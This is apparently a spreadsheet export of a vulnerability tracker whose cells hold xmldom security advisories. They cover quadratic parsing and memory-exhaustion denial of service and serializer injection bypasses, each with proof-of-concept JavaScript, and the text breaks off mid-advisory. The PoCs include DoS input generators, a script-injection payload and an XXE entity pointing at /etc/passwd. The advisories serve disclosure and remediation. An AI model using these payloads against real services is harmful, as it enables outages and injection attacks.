- `normalize()` adjacent-text merge — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L1336-L1356
- `removeChild` re-index-all branch — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L1788-L1798
- `appendData` string rebuild — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L2786-L2790

Code (0.8.x, `e5c14802592685bb872c042c54c3f73758875c85`):

- `endDocument` → `normalize()` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom-parser.js#L213-L214
- `normalize()` merge — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L529-L549
- `removeChild` re-index-all branch — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L756-L773
- `appendData` string rebuild — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1533

### Finding B is additionally reachable programmatically (no parser involved)

`Node.prototype.normalize()` is public API on every `Document`/`Element`. A tree built entirely through
the ordinary DOM API — `new DOMImplementation().createDocument(...)`, then K× `createTextNode` +
`appendChild` on one parent — reaches the **same** O(K²) merge when the application calls `normalize()`,
with **no** parsing and **no** error-recovery. The parser is only *one* of the two callers of the
vulnerable merge:

- the parser's automatic `endDocument()` → `document.normalize()` (the parse-path trigger above), and
- any explicit application call to the public `normalize()` on a tree with adjacent text nodes.

`XMLSerializer` does **not** call `normalize()`, so serializing an un-merged tree is O(total text), not
O(K²); the O(K²) surface is exactly those two `normalize()` callers. Consequently a parser-side bound
alone cannot remediate Finding B — the fix must live in `normalize()`.

## Affected Versions

Both findings are present across the full published `@xmldom/xmldom` history — both
currently-maintained versions (`0.8.x` and `0.9.x`) are affected — and across the retired unscoped
`xmldom` line. Finding B's `normalize()` merge is additionally reachable **programmatically**: a
direct `normalize()` call on a DOM built with adjacent text nodes hits the same O(K²) merge,
independent of the parser — so, unlike Finding A, it does not require the malformed-input recovery
path.

## Proof of Concept

Default `DOMParser`, no options. The input is trivially compressible (`a&lt;` / `a&lt;&gt;` repeated) and
never throws — it is parsed via the recovery path.

```js
const { DOMParser } = require('@xmldom/xmldom');

// Silence the expected `error`-level recovery reports (default handler logs
// them to console.error without throwing; only fatalError throws).
console.error = function () {};

function timeParse(label, xml, mime) {
  const t0 = process.hrtime.bigint();
  new DOMParser().parseFromString(xml, mime); // completes; no exception
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  console.log(label + '  bytes=' + Buffer.byteLength(xml) + '  time=' + ms.toFixed(1) + ' ms');
}

for (const N of [4000, 8000, 16000, 32000]) {
  // Finding A: long re-scans, O(n^2) during parse.
  timeParse('A N=' + N, '&lt;r&gt;' + 'a&lt;'.repeat(N) + '&lt;/r&gt;', 'text/xml');
  // Finding B: short re-scans (cheap parse) but K adjacent text nodes -&gt; O(K^2) in normalize().
  timeParse('B N=' + N, '&lt;r&gt;' + 'a&lt;&gt;'.repeat(N) + '&lt;/r&gt;', 'text/html');
  // Combined: ONE input hits both A and B under the default parser.
  timeParse('C N=' + N, '&lt;r&gt;' + 'a&lt;'.repeat(N) + '&lt;/r&gt;', 'text/xml');
}
```

Measured on Node v18.20.8 (absolute ms vary by host; the load-bearing fact is that doubling the
input ~quadruples the time — canonical O(n²)):

Finding A, isolated (`"&lt;r&gt;" + "a&lt;"×N + "&lt;/r&gt;"`, normalize disabled to isolate the re-scan):

| N | input bytes | `@xmldom/xmldom` 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 2000 | 4007 | 43 ms | 37 ms |
| 4000 | 8007 | 129 ms | 106 ms |
| 8000 | 16007 | 434 ms | 424 ms |
| 16000 | 32007 | 1629 ms | 1611 ms |

Finding B, isolated (`"&lt;r&gt;" + "a&lt;&gt;"×N + "&lt;/r&gt;"`, time attributable to `normalize()`):

| K (N) | input bytes | 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 4000 | 12007 | 120 ms | 165 ms |
| 8000 | 24007 | 589 ms | 771 ms |
| 16000 | 48007 | 3142 ms | 4448 ms |
| 32000 | 96007 | 12127 ms | 12951 ms |

Combined (default parser, both findings; `"&lt;r&gt;" + "a&lt;"×N + "&lt;/r&gt;"`):

| N | input bytes | 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 4000 | 8007 | 341 ms | 397 ms |
| 8000 | 16007 | 1894 ms | 1641 ms |
| 16000 | 32007 | 4398 ms | 7661 ms |

~32 KB of input → several seconds of single-threaded event-loop stall.

### Finding B via the public `normalize()` API (no parser)

```js
const { DOMImplementation } = require('@xmldom/xmldom');

function timeNormalize(K) {
  const doc = new DOMImplementation().createDocument(null, 'r', null);
  const el = doc.documentElement;
  for (let i = 0; i &lt; K; i++) el.appendChild(doc.createTextNode('x')); // K adjacent text nodes
  const t0 = process.hrtime.bigint();
  doc.normalize();                                    // O(K^2) merge — no parsing involved
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  console.log('K=' + K + '  time=' + ms.toFixed(1) + ' ms');
}
for (const K of [2000, 4000, 8000, 16000, 32000]) timeNormalize(K);
```

Measured on Node v18.20.8 (doubling K ~quadruples the time — O(K²)):

| K | 0.9.10 | 0.8.13 |
|--:|--:|--:|
| 2000 | 5.7 ms | 5.6 ms |
| 32000 | 1263 ms | 1704 ms |

This path is reachable by any application that builds a DOM from attacker-influenced data and calls
`normalize()`, entirely independent of `DOMParser`.

## Impact

Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic work (multiple seconds at tens of KB; larger inputs scale as O(n²)). No
memory blow-up beyond transient strings, no data exposure, no integrity impact. Because XML is
routinely accepted from untrusted sources and parsed with default options, one request can stall a
server. The payloads are highly compressible, so any endpoint accepting compressed XML faces
additional amplification. Finding B is additionally reachable via an explicit `normalize()` call on a
programmatically built DOM (see Proof of Concept), so applications that construct a document from attacker-influenced
data and normalize it are exposed even without parsing.

## Severity note

The complexity is **quadratic**, not exponential, so a multi-second stall requires
tens-to-hundreds of KB of input. `VA:H` reflects that xmldom applies **no** input-size limit and the
path runs on default-options parsing, so a single unbounded parse can fully stall the event loop.

## Fix Applied

Two independent, non-breaking fixes shipped together — each alone leaves the other's quadratic cost dominating the default parse.
Finding A — terminate the malformed tag-name scan at an embedded `&lt;`, so error recovery is linear instead of O(n²). DOM output is unchanged; only the reported error-message text differs (error strings are not a semver contract).
Finding B — merge adjacent text nodes in `normalize()` in O(K) instead of O(K²), which also closes the same slowdown reachable programmatically through a direct `normalize()` call. Both ship on both maintained versions.</t></is></c><c r="T55" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83614</t></is></c></row><row r="56"><c r="A56" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B56" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C56" s="5" t="inlineStr"><is><t>CVE-2026-83615</t></is></c><c r="D56" s="5" t="inlineStr" /><c r="E56" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F56" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G56" s="5" t="inlineStr" /><c r="H56" s="5" t="n"><v>0.004</v></c><c r="I56" s="5" t="inlineStr" /><c r="J56" s="5" t="inlineStr" /><c r="K56" s="5" t="inlineStr" /><c r="L56" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M56" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N56" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O56" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P56" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q56" s="5" t="inlineStr" /><c r="R56" s="5" t="inlineStr" /><c r="S56" s="5" t="inlineStr"><is><t>## Summary

When an element declares a namespace prefix, xmldom copies the entire in-scope namespace map
into a fresh object and keeps that copy on the element while it is open on the parse stack. A
crafted document that nests N elements, each declaring one unique prefix, therefore drives the
parser to hold on the order of N(N+1)/2 = **O(N²) namespace-map entries at its peak**, so a small,
highly compressible input exhausts the heap. Parsing runs under default options on untrusted,
network-delivered XML, so a sub-megabyte payload can OOM-crash the process before any
application-level validation runs — an unauthenticated denial of service.

## Details

`appendElement` performs the copy: `_copy` clones the current namespace map into a fresh object for
each prefix-declaring element, and the copy is retained on that element's parse-stack entry:

```js
if (localNSMap == null) {
    localNSMap = Object.create(null);
    _copy(currentNSMap, (currentNSMap = Object.create(null)));   // full copy of all ancestor prefixes
}
currentNSMap[nsPrefix] = localNSMap[nsPrefix] = value;
...
el.currentNSMap = currentNSMap;   // retained while the element is open on the parse stack
```

https://github.com/xmldom/xmldom/blob/08a22d78e4bc50f12ce9f5090b8d96ee6031ac7b/lib/sax.js#L467-L540

The copies stack: the element at depth `i` copies a map of size ~`i`, and every ancestor stays live
on the parse stack until it closes, so at the deepest point Σ`i` namespace entries are held at once.
That peak is transient — the completed DOM retains only O(N), one small namespace map per node — but
it is reached during parsing, which is what OOM-crashes the process.

## Proof of Concept

A minimal document — N nested elements, each declaring one unique namespace prefix (no SAML wrapper
needed):

```js
const { DOMParser } = require('@xmldom/xmldom');

function build(n) {
  let open = '', close = '';
  for (let i = 0; i &lt; n; i++) { open += `&lt;a xmlns:p${i}="urn:${i}"&gt;`; close = '&lt;/a&gt;' + close; }
  return `&lt;r&gt;${open}${close}&lt;/r&gt;`;   // &lt;r&gt;&lt;a xmlns:p0="urn:0"&gt;...&lt;a xmlns:p{n-1}="urn:{n-1}"&gt;...&lt;/a&gt;...&lt;/r&gt;
}

for (const n of [2000, 4000, 8000, 16000]) {
  const src = build(n);
  new DOMParser().parseFromString(src, 'text/xml');   // peak memory ~ O(n^2)
  console.log(n, (src.length / 1024).toFixed(0) + ' KB in', (process.resourceUsage().maxRSS / 1024).toFixed(0) + ' MB peak RSS');
}
```

Measured on Node.js v24 (peak RSS ~quadruples per doubling of depth; absolute numbers vary by host):

| depth  | input   | peak RSS                        |
| -----: | ------: | ------------------------------- |
|  2,000 |  56 KB  | 266 MB                          |
|  4,000 | 115 KB  | 622 MB                          |
|  8,000 | 232 KB  | 1.9 GB                          |
| 16,000 | ~470 KB | OOM crash (default ~4 GB heap)  |

About 470 KB of trivially-generated, highly-compressible input crashes a default Node.js process;
larger depths scale as O(N²) into the tens of GB, crashing larger hosts (as first measured by the
reporter with a SAML-shaped payload).

## Impact

Unauthenticated denial of service against any service that parses attacker-influenced XML with
xmldom under default options. A single sub-megabyte request drives multi-gigabyte peak memory and
can OOM-crash the process before any application-level validation (e.g. schema checks or a SAML
signature verification) runs. The payload is a plain namespace-nesting document and highly
compressible, so it is effective over compressed transports (e.g. an HTTP-Redirect / DEFLATE
binding, not only POST bindings).

## Severity note

The CVSS 4.0 vector scores availability only (`VC:N/VI:N/VA:H`): the flaw neither discloses nor
alters data, it exhausts the heap. `VA:H` is justified because a single unauthenticated,
network-delivered request (`AV:N/PR:N/UI:N`) of trivial complexity (`AC:L/AT:N`) drives the parser
to multi-gigabyte peak memory and OOM-crashes the process before any application-level logic runs —
a full loss of availability for the affected service.

## Fix Applied

Inherit each element's in-scope namespace map through the prototype chain instead of copying it for every prefix-declaring element, so a deeply namespaced document holds O(N) namespace entries instead of O(N²) at peak. Behavior-preserving: serialized output is byte-identical, only the memory cost drops. Non-breaking and independent of `requireWellFormed`; ships on both maintained versions.</t></is></c><c r="T56" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83615</t></is></c></row><row r="57"><c r="A57" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B57" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C57" s="5" t="inlineStr"><is><t>CVE-2026-83616</t></is></c><c r="D57" s="5" t="inlineStr" /><c r="E57" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F57" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G57" s="5" t="inlineStr" /><c r="H57" s="5" t="n"><v>0.003</v></c><c r="I57" s="5" t="inlineStr" /><c r="J57" s="5" t="inlineStr" /><c r="K57" s="5" t="inlineStr" /><c r="L57" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M57" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N57" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O57" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P57" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q57" s="5" t="inlineStr" /><c r="R57" s="5" t="inlineStr" /><c r="S57" s="5" t="inlineStr"><is><t>## Summary

`Document.createProcessingInstruction()` in `@xmldom/xmldom` performs no validation on the `target` parameter. The `requireWellFormed: true` serializer option validates only for `:` in the target and a case-insensitive `xml` prefix, but does not check for `&gt;` characters. A `&gt;` in the target breaks the processing instruction boundary (`&lt;?...?&gt;`), allowing injection of arbitrary content into the serialized XML output.

## Details

`Document.createProcessingInstruction(target, data)` at `lib/dom.js` around line 2413 accepts any string as the `target` parameter and stores it on the PI node without validation.

During serialization, the `requireWellFormed` code path (around line 3286) performs two checks on PI targets:

1. Rejects targets containing `:` (namespace prefix check)
2. Rejects targets matching `xml` case-insensitively (reserved prefix)

However, it does NOT validate that the target conforms to the XML Name production, and critically does NOT check for `&gt;` characters. Since processing instructions are serialized as `&lt;?target data?&gt;`, a `&gt;` in the target prematurely closes the PI, causing the remaining content to be interpreted as document content by any downstream XML parser.

### Root Cause

1. `createProcessingInstruction()` performs no validation on `target`
2. The serializer's `requireWellFormed` check is incomplete -- it only checks for `:` and `xml`, missing characters that break PI syntax (`&gt;`, `?`, whitespace)
3. The serializer emits the target verbatim: `&lt;?${target} ${data}?&gt;`

## Proof of Concept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const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// Output: &lt;root&gt;&lt;?a&gt; data?&gt;&lt;/root&gt;
//
// The &gt; in the target closes the PI prematurely.
// A downstream XML parser sees:
//   - Processing instruction: &lt;?a?&gt;  (target "a", no data)
//   - Text content: " data?&gt;"
//
// requireWellFormed: true did NOT prevent the injection.
```

### Injecting elements via PI target

```javascript
const pi2 = doc.createProcessingInstruction(
  'a?&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;?b',
  ''
);
doc.documentElement.appendChild(pi2);

const output2 = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output2);
// Output includes:
//   &lt;?a?&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;?b ?&gt;
//
// The injected &lt;script&gt; element is valid XHTML that a browser would execute.
```

## Impact

Applications that create processing instructions with user-controlled target strings and serialize the result are vulnerable to XML injection. This enables:

- **XML structure injection**: Breaking the PI boundary to inject arbitrary elements, text, or additional processing instructions into the output
- **XSS via XHTML**: If the serialized output is served as XHTML or processed by a browser-based XML parser, injected script elements will execute
- **XXE chain**: Injected DOCTYPE declarations or entity references could trigger XXE in downstream XML parsers that consume the output
- **requireWellFormed bypass**: The existing well-formedness checks are incomplete and provide a false sense of security

## Fix Applied

Under `requireWellFormed`, the serializer validates a processing-instruction target as an XML `NCName` (a `Name` with no colon) and rejects a case-insensitive `xml`, throwing `InvalidStateError` when the target is ill-formed — so a `&gt;`, `?`, or whitespace in the target is now refused.\
On 0.9.12 this replaces an earlier check that already rejected a colon or `xml`, so the no-colon rule is preserved.\
0.8.15 had no processing-instruction target check at all, so the whole target validation is new there.\
Non-breaking and opt-in.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 Default path: emits the ill-formed target verbatim.
console.log(serializer.serializeToString(doc));
// Output: &lt;root&gt;&lt;?a&gt; data?&gt;&lt;/root&gt;

// Opt-in path: the target check now rejects the break-out character.
try {
  serializer.serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name); // InvalidStateError
}
```

### Why the default stays verbatim

W3C DOM Parsing's require-well-formed flag defaults to false, and the browser `XMLSerializer` emits the target verbatim in that default mode. Unconditionally throwing on an ill-formed PI target would diverge from that platform behavior and would be an unjustified breaking change, so the stricter validation is gated behind `{ requireWellFormed: true }`. (See the [W3C XML Name production](https://www.w3.org/TR/xml/#NT-Name) and [XML Processing Instructions](https://www.w3.org/TR/xml/#sec-pi).)

### Residual limitation

The default serialization path still emits the ill-formed target verbatim -- only the opt-in `requireWellFormed` path is protected. Creation-time validation of the `target` in `createProcessingInstruction()` is breaking and is deferred to the next breaking release, tracked at [xmldom/xmldom#1073](https://github.com/xmldom/xmldom/issues/1073).</t></is></c><c r="T57" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83616</t></is></c></row><row r="58"><c r="A58" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B58" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C58" s="5" t="inlineStr"><is><t>CVE-2026-83617</t></is></c><c r="D58" s="5" t="inlineStr" /><c r="E58" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F58" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G58" s="5" t="inlineStr" /><c r="H58" s="5" t="n"><v>0.003</v></c><c r="I58" s="5" t="inlineStr" /><c r="J58" s="5" t="inlineStr" /><c r="K58" s="5" t="inlineStr" /><c r="L58" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M58" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N58" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O58" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P58" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q58" s="5" t="inlineStr" /><c r="R58" s="5" t="inlineStr" /><c r="S58" s="5" t="inlineStr"><is><t>## Summary

An embedded line terminator bypasses the `requireWellFormed` serializer check for element and
attribute names. The check was added to fix GHSA-w2rr-34g9-rvrj and GHSA-4w3w-2rp5-g8jm; a name whose
first line is well-formed slips past it and is serialized verbatim, so the characters after the line
terminator break out of the start/end tag or attribute. Callers who enabled `requireWellFormed`
specifically to neutralize those name-injection issues remain exposed.

## Details

xmldom builds every grammar production through a shared regexp builder that compiles with the `m`
flag. The anchored full-string matcher used for element and attribute names, `QName_exact =
reg('^', QName, '$')`, therefore inherits `m`. When it is applied as `QName_exact.test(name)` against
an already-assembled node name, the `m` flag makes `$` match at an interior line terminator, so the
matcher accepts any value in which **at least one line** is a valid `QName`; the other lines are never
constrained. A payload whose first line is a valid `QName`, followed by a line terminator and breakout
markup, is what yields a working injection.

The serializer emits the accepted name verbatim into element start/end tags and attribute names, so
the bytes after the line terminator break out of the intended syntactic position. The check is
reached whenever a caller serializes, with `requireWellFormed: true`, a node whose name was set
through programmatic DOM construction (`createElement`, `createElementNS`, `createAttribute`,
`createAttributeNS`) with attacker-influenced input.

### Root Cause

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. A full-string validator built on such a production (`.test()`) accepts any string with one
   conforming line, so a line terminator followed by breakout markup passes.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

// Element name carrying an embedded line terminator + breakout markup:
const doc = new DOMImplementation().createDocument(null, 'root', null);
const el = doc.createElement('a\n&gt;&lt;script&gt;alert(1)&lt;/script');
doc.documentElement.appendChild(el);

// Caller opted into well-formed serialization, expecting invalid names to be rejected:
console.log(new XMLSerializer().serializeToString(doc, { requireWellFormed: true }));
// Observed on the affected version: NO throw; the output contains the injected `&gt;&lt;script&gt;…`
// breakout, because the name's first line ("a") satisfies the m-anchored QName check.
// Expected: InvalidStateError (the name is not a valid XML QName).

// Control — a single-line invalid name IS correctly rejected, proving the check is active and
// that only the line terminator defeats it:
const ctrl = new DOMImplementation().createDocument(null, 'root', null);
ctrl.documentElement.appendChild(ctrl.createElement('a b'));
new XMLSerializer().serializeToString(ctrl, { requireWellFormed: true });
// =&gt; throws InvalidStateError: The element name "a b" is not a valid XML QName
```

## Impact

- **Bypass of a previously shipped security mitigation.** Applications that adopted
  `requireWellFormed: true` specifically to neutralize GHSA-w2rr-34g9-rvrj / GHSA-4w3w-2rp5-g8jm
  remain exposed to element/attribute name injection.
- **XML / markup structure injection**, and, where the serialized output is placed into an HTML
  context, downstream XSS.

## Fix Applied

The anchored XML `Name`/`QName` validators used by the `requireWellFormed` serializer no
longer treat interior line terminators as satisfying the anchors, so a name is validated against the
whole string. A name containing a line terminator is rejected with `InvalidStateError`, closing the
bypass for element and attribute names. The default serialization path is unchanged.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```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const doc = new DOMImplementation().createDocument(null, 'root', null);
const el = doc.createElement('a\n&gt;&lt;script&gt;alert(1)&lt;/script');
doc.documentElement.appendChild(el);

// Default path (require-well-formed off) — unchanged, still emits the name verbatim,
// so the `&gt;&lt;script&gt;…` bytes break out of the start tag:
new XMLSerializer().serializeToString(doc);

// Opted-in path — now rejected:
new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
// throws InvalidStateError: The element name "a\n&gt;&lt;script&gt;alert(1)&lt;/script" is not a valid XML QName
```

### Why the default stays verbatim

The W3C DOM Parsing require-well-formed flag defaults to false, and browser `XMLSerializer` emits
names verbatim when it is unset. Throwing unconditionally would be an unjustified breaking change, so
the check stays gated on the caller opting in with `{ requireWellFormed: true }`.

### Residual limitation

The default serialization path (no `requireWellFormed`) still emits names verbatim by design (above).
Names introduced through `createElement` / `setAttribute` are never validated at creation — those APIs
store the name unchecked by design — so the opt-in serializer check remains the only guard on that
path.</t></is></c><c r="T58" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83617</t></is></c></row><row r="59"><c r="A59" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B59" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C59" s="5" t="inlineStr"><is><t>CVE-2026-83618</t></is></c><c r="D59" s="5" t="inlineStr" /><c r="E59" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F59" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G59" s="5" t="inlineStr" /><c r="H59" s="5" t="n"><v>0.003</v></c><c r="I59" s="5" t="inlineStr" /><c r="J59" s="5" t="inlineStr" /><c r="K59" s="5" t="inlineStr" /><c r="L59" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M59" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N59" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O59" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P59" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q59" s="5" t="inlineStr" /><c r="R59" s="5" t="inlineStr" /><c r="S59" s="5" t="inlineStr"><is><t>## Summary

An embedded line terminator bypasses the `requireWellFormed` serializer check for a `DocumentType`'s
publicId and systemId. The check was added to fix GHSA-f6ww-3ggp-fr8h; an id whose first line is a
valid literal slips past it and is emitted verbatim into the `&lt;!DOCTYPE …&gt;` declaration, so the markup
after the line terminator breaks out into the surrounding document. Callers who enabled
`requireWellFormed` to neutralize DocumentType injection remain exposed.

## Details

`publicId` and `systemId` are stored as raw values **including their surrounding quotes**, and the
`PubidLiteral`/`SystemLiteral` productions include those quotes. The serializer validates them with
`g.PubidLiteral_match.test(publicId)` and `g.SystemLiteral_match.test(systemId)`, where both matchers
are `reg('^', …, '$')` and inherit the `m` flag from xmldom's shared regexp builder. Under `m`, `$`
matches at an interior line terminator, so a value such as `"valid pubid"\n"&gt;&lt;!ENTITY …&gt;` satisfies
the matcher on its first line (`"valid pubid"` is a complete `PubidLiteral`) and the whole value —
including the post-newline breakout — is emitted after `PUBLIC`/`SYSTEM`.

### Root Cause

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. A full-string validator built on such a production (`.test()`) accepts any string with one
   conforming line, so a complete, valid literal on the first line passes even though a line terminator
   and breakout markup follow. `PubidChar` excluding `&lt;`/`&gt;` does not prevent it — the breakout is
   appended *after* the literal, not embedded inside it.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.

## Affected Versions

Only `@xmldom/xmldom` 0.9.x is affected. The vulnerable matchers are built by `lib/grammar.js`'s
`m`-flagged `reg()` builder, and the DocType `publicId`/`systemId` `requireWellFormed` check that
consumes them was introduced in 0.9.10 (the GHSA-f6ww-3ggp-fr8h fix); 0.9.10 and 0.9.11 carry it.
`0.8.x` performs the same `requireWellFormed` check with inline, non-`m` regular expressions and is not
affected. The unscoped `xmldom` package has no `grammar.js` and no `requireWellFormed` serializer, so
there is no check to bypass.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();

// publicId: complete literal on line 1, then newline + breakout
const dt = impl.createDocumentType('html', '"valid pubid"\n"&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;', '');
const doc = impl.createDocument(null, 'root', dt);
console.log(new XMLSerializer().serializeToString(doc, { requireWellFormed: true }));
// Observed (no throw):
//   &lt;!DOCTYPE html PUBLIC "valid pubid"
//   "&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;&gt;&lt;root/&gt;
// Expected: InvalidStateError (publicId is not a valid PubidLiteral).
// Control: a single-line invalid publicId ("no-surrounding-quotes&lt;&gt;") DOES throw InvalidStateError,
// confirming the check is active and specifically bypassed by the line terminator.
```

## Impact

- **Bypass of the GHSA-f6ww-3ggp-fr8h mitigation.** Applications that adopted `requireWellFormed:
  true` to neutralize DocumentType injection remain exposed.
- **XML structure injection into the DOCTYPE**, including injected markup / entity declarations after
  the public or system identifier.

## Fix Applied

The anchored `PubidLiteral`/`SystemLiteral` validators used by the `requireWellFormed`
serializer no longer treat an interior line terminator as satisfying the `$` anchor, so a `publicId`
or `systemId` containing any ECMAScript `LineTerminator` (U+000A, U+000D, U+2028, U+2029) is rejected
with `InvalidStateError`. Valid single-line identifiers serialize unchanged, and the default
serialization path is unaffected.

&gt; **⚠ Opt-in required.** Protection is not automatic. Existing serialization calls remain vulnerable
&gt; unless `{ requireWellFormed: true }` is explicitly passed. Applications that serialize untrusted DOM
&gt; content should audit all `serializeToString()` call sites and add it.

### Proof of Concept - fixed path

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const dt = impl.createDocumentType('html', '"valid pubid"\n"&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;', '');
const doc = impl.createDocument(null, 'root', dt);

// Default path (requireWellFormed off) — unchanged, still emits verbatim:
console.log(new XMLSerializer().serializeToString(doc));
//   &lt;!DOCTYPE html PUBLIC "valid pubid"
//   "&gt;&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;&gt;&lt;root/&gt;

// Opt-in path — now throws instead of emitting the breakout:
new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
//   InvalidStateError: DocumentType publicId is not a valid PubidLiteral
```

### Why the default stays verbatim

The W3C DOM Parsing "require well-formed" flag defaults to false, and a browser `XMLSerializer` emits
the DOCTYPE verbatim. Unconditionally throwing on a malformed `publicId`/`systemId` would be an
unjustified breaking change to the default path, so the fix tightens only the opt-in
`requireWellFormed` validator, matching browser and spec defaults.

### Residual limitation

The guarantee holds only for callers that pass `{ requireWellFormed: true }`; the default
serialization path still emits `publicId`/`systemId` verbatim. `publicId` and `systemId` are not
validated at creation (`createDocumentType`) or on direct property assignment
(`documentType.publicId = …`) — the WHATWG DOM specification places no well-formedness constraint on
these fields at creation time, so the serializer is the spec-aligned enforcement point.</t></is></c><c r="T59" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83618</t></is></c></row><row r="60"><c r="A60" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B60" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C60" s="5" t="inlineStr"><is><t>CVE-2026-83619</t></is></c><c r="D60" s="5" t="inlineStr" /><c r="E60" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F60" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G60" s="5" t="inlineStr" /><c r="H60" s="5" t="n"><v>0.003</v></c><c r="I60" s="5" t="inlineStr" /><c r="J60" s="5" t="inlineStr" /><c r="K60" s="5" t="inlineStr" /><c r="L60" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M60" s="5" t="inlineStr"><is><t>0.8.15</t></is></c><c r="N60" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O60" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P60" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q60" s="5" t="inlineStr" /><c r="R60" s="5" t="inlineStr" /><c r="S60" s="5" t="inlineStr"><is><t>## Summary

On the `@xmldom/xmldom` **`0.8.x`** line, parsing an XML end tag whose name is followed by a long run
of whitespace and then a non-whitespace character triggers quadratic-time regular-expression
backtracking (ReDoS), so a single small crafted end tag stalls the Node.js event loop. It is reachable
from `DOMParser.parseFromString` under **default options**, unauthenticated, before any validity
check — an availability-only denial of service. The `0.9.x` line is **not** affected.

## Details

`lib/sax.js` (release-0.8.x, commit `e5c1480`) trims trailing whitespace from a captured end-tag name
with an unanchored global regex:

